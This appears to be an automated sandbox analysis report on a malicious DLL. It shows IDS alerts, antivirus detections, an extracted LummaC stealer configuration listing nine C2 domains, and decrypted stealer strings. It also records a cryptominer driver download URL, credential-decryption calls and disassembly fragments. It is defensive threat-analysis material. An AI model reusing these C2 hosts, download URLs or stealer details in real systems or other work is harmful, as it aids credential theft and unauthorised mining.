                2024-11-14T12:19:34.410278+010020574161Domain Observed Used for C2 Detected192.168.2.1049835188.114.97.3443TCP
                2024-11-14T12:19:34.941754+010020574161Domain Observed Used for C2 Detected192.168.2.1049839188.114.97.3443TCP
                2024-11-14T12:19:40.521903+010020574161Domain Observed Used for C2 Detected192.168.2.1049867188.114.97.3443TCP
                2024-11-14T12:19:43.416747+010020574161Domain Observed Used for C2 Detected192.168.2.1049883188.114.97.3443TCP
                2024-11-14T12:19:43.482312+010020574161Domain Observed Used for C2 Detected192.168.2.1049887188.114.97.3443TCP
                2024-11-14T12:19:46.363351+010020574161Domain Observed Used for C2 Detected192.168.2.1049903188.114.97.3443TCP
                2024-11-14T12:19:46.838915+010020574161Domain Observed Used for C2 Detected192.168.2.1049904188.114.97.3443TCP
                2024-11-14T12:19:48.321902+010020574161Domain Observed Used for C2 Detected192.168.2.1049914188.114.97.3443TCP
                2024-11-14T12:19:48.386896+010020574161Domain Observed Used for C2 Detected192.168.2.1049915188.114.97.3443TCP
                2024-11-14T12:19:50.115623+010020574161Domain Observed Used for C2 Detected192.168.2.1049926188.114.97.3443TCP
                2024-11-14T12:19:51.951371+010020574161Domain Observed Used for C2 Detected192.168.2.1049934188.114.97.3443TCP
                2024-11-14T12:19:53.708804+010020574161Domain Observed Used for C2 Detected192.168.2.1049945188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:27.129637+010020573341Domain Observed Used for C2 Detected192.168.2.10528841.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:27.080611+010020573381Domain Observed Used for C2 Detected192.168.2.10526201.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:27.105185+010020573401Domain Observed Used for C2 Detected192.168.2.10620491.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:28.860579+010020574151Domain Observed Used for C2 Detected192.168.2.10570281.1.1.153UDP
                2024-11-14T12:19:42.869997+010020574151Domain Observed Used for C2 Detected192.168.2.10635191.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:26.943414+010020573601Domain Observed Used for C2 Detected192.168.2.10594351.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:27.180272+010020573441Domain Observed Used for C2 Detected192.168.2.10553361.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:27.021061+010020573461Domain Observed Used for C2 Detected192.168.2.10540031.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:27.155239+010020573481Domain Observed Used for C2 Detected192.168.2.10529471.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:27.206024+010020573501Domain Observed Used for C2 Detected192.168.2.10536171.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:27.048602+010020573541Domain Observed Used for C2 Detected192.168.2.10550821.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:48.814861+010020480941Malware Command and Control Activity Detected192.168.2.1049914188.114.97.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:20:17.515654+010028290562Crypto Currency Mining Activity Detected192.168.2.1049995147.45.47.8180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-14T12:19:28.728959+010028586661Domain Observed Used for C2 Detected192.168.2.1049794104.102.49.254443TCP
                2024-11-14T12:19:28.744377+010028586661Domain Observed Used for C2 Detected192.168.2.1049793104.102.49.254443TCP
                2024-11-14T12:19:31.561533+010028586661Domain Observed Used for C2 Detected192.168.2.1049814104.102.49.254443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://tamedgeesy.sbs/apisAvira URL Cloud: Label: malware
                Source: https://tamedgeesy.sbs/apizAvira URL Cloud: Label: malware
                Source: https://tamedgeesy.sbs/apiYAvira URL Cloud: Label: malware
                Source: https://marshal-zhukov.com/kIAvira URL Cloud: Label: malware
                Source: https://relalingj.sbs/Avira URL Cloud: Label: malware
                Source: https://tamedgeesy.sbs/hAvira URL Cloud: Label: malware
                Source: https://marshal-zhukov.com/apizAvira URL Cloud: Label: malware
                Source: https://marshal-zhukov.com/apionAvira URL Cloud: Label: malware
                Source: https://rottieud.sbs/apibsAvira URL Cloud: Label: malware
                Source: https://marshal-zhukov.com/apigAvira URL Cloud: Label: malware
                Source: https://marshal-zhukov.com/apimAvira URL Cloud: Label: malware
                Source: https://marshal-zhukov.com/apieAvira URL Cloud: Label: malware
                Source: https://tamedgeesy.sbs/Avira URL Cloud: Label: malware
                Source: http://147.45.47.81/WinRing0x64.sysAvira URL Cloud: Label: malware
                Source: https://tamedgeesy.sbs/aAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeAvira: detection malicious, Label: TR/Redcap.bgduw
                Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeAvira: detection malicious, Label: TR/Dldr.Agent.vfpsy
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeAvira: detection malicious, Label: TR/Redcap.bgduw
                Source: 7.2.aspnet_regiis.exe.77060000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["thinkyyokej.sbs", "explainvees.sbs", "tamedgeesy.sbs", "rottieud.sbs", "ducksringjk.sbs", "brownieyuz.sbs", "repostebhu.sbs", "relalingj.sbs", "pragapin.sbs"]}
                Source: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exeReversingLabs: Detection: 79%
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeReversingLabs: Detection: 79%
                Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeReversingLabs: Detection: 91%
                Source: n7ZKbApaa3.dllReversingLabs: Detection: 71%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeJoe Sandbox ML: detected
                Source: n7ZKbApaa3.dllJoe Sandbox ML: detected
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: tamedgeesy.sbs
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: relalingj.sbs
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: rottieud.sbs
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: brownieyuz.sbs
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: explainvees.sbs
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: ducksringjk.sbs
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: thinkyyokej.sbs
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: repostebhu.sbs
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: pragapin.sbs
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77075889 CryptUnprotectData,8_2_77075889

                Bitcoin Miner

                barindex
                Source: Yara matchFile source: 33.2.RegSvcs.exe.243329d.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000021.00000002.1979634479.000000000247D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Installer.exe PID: 4952, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6704, type: MEMORYSTR
                Source: n7ZKbApaa3.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49794 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49793 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49802 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49803 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49814 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49816 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49818 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49835 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49839 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49867 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49883 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49887 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49903 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49904 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49914 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49915 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49926 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49934 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49945 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.10:49994 version: TLS 1.2
                Source: n7ZKbApaa3.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Installer.exe, 0000001F.00000003.1911606437.0000000003B22000.00000040.00001000.00020000.00000000.sdmp, Installer.exe, 0000001F.00000002.1911910899.000000000038C000.00000004.00000001.01000000.0000000A.sdmp, RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmp
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: RegSvcs.exe, 00000021.00000002.1979634479.0000000002540000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000021.00000002.1979634479.0000000002498000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.33.dr
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 50DC24C7h8_2_7709C7E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx8_2_7706B620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, ecx8_2_77086C5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h8_2_7709CC90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax8_2_77098CAB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push ebp8_2_7706A282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov esi, dword ptr [ebp-38h]8_2_77080AE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx8_2_7707E110
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx8_2_7707E110
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp al, 5Ch8_2_77062170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx+esi-7A63F87Eh]8_2_770989A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-4454A80Eh]8_2_77081702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h8_2_77085710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push esi8_2_7706CF31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-0000014Dh]8_2_77081F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax8_2_77081F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]8_2_77084767
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+5Ch]8_2_7707E778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx8_2_7707E778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edi8_2_7709B7A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edi8_2_7709BFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-0000014Dh]8_2_77081600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax8_2_77081600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]8_2_7709A610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h8_2_7707CE30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, edx8_2_77085E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 3E416E49h8_2_7709AEA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+esi+08h]8_2_7709AEA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], dx8_2_770676C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]8_2_770986FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea ecx, dword ptr [esp+38h]8_2_770816F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, edi8_2_77069510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_77081D44
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx8_2_7707755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], cl8_2_7707755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx8_2_77095586
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx]8_2_770805A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_770795D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h8_2_7707FC1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h8_2_7707FC1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, bx8_2_7707FC1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+48h]8_2_7707BC30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_77090480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], B62B8D10h8_2_77083490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edi8_2_7709BCB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [esi+000000D8h]8_2_77073CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h8_2_77073CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-69DA3076h]8_2_77084CDE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 3602324Eh8_2_7709D310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebp, word ptr [eax]8_2_7709D310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+2Ch]8_2_7706D321
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-5A7985B9h]8_2_77096B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push F2FFBC90h8_2_7706A34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebp8_2_77065B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebp8_2_77065B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, dword ptr [ecx+eax]8_2_77098B93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 16194952h8_2_77096230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, FFFFFFFFh8_2_77074249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_77087A82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edi8_2_7709BAE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx8_2_77074914
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax8_2_77076940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx8_2_77083160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_77085170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]8_2_770770F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_770879B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push edi8_2_770881E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h8_2_77084017
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h8_2_77080040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, edx8_2_7709D040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], DD26B4F7h8_2_7709D040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-0A5A5402h]8_2_7707D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx8_2_7707D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ecx8_2_770808EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]8_2_770778EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]8_2_770770F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx10_2_7706B620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax10_2_77098CAB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push ebp10_2_7706A282
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx+esi-7A63F87Eh]10_2_770989A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-4454A80Eh]10_2_77081702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h10_2_77085710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push esi10_2_7706CF31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-0000014Dh]10_2_77081F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax10_2_77081F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]10_2_77084767
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+5Ch]10_2_7707E778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx10_2_7707E778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edi10_2_7709B7A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edi10_2_7709BFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 50DC24C7h10_2_7709C7E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-0000014Dh]10_2_77081600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, eax10_2_77081600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]10_2_7709A610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h10_2_7707CE30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, edx10_2_77085E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 3E416E49h10_2_7709AEA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+esi+08h]10_2_7709AEA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], dx10_2_770676C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]10_2_770986FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea ecx, dword ptr [esp+38h]10_2_770816F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, edi10_2_77069510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], cl10_2_77081D44
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx10_2_7707755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], cl10_2_7707755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp edx10_2_77095586
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx]10_2_770805A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_770795D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h10_2_7707FC1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h10_2_7707FC1B
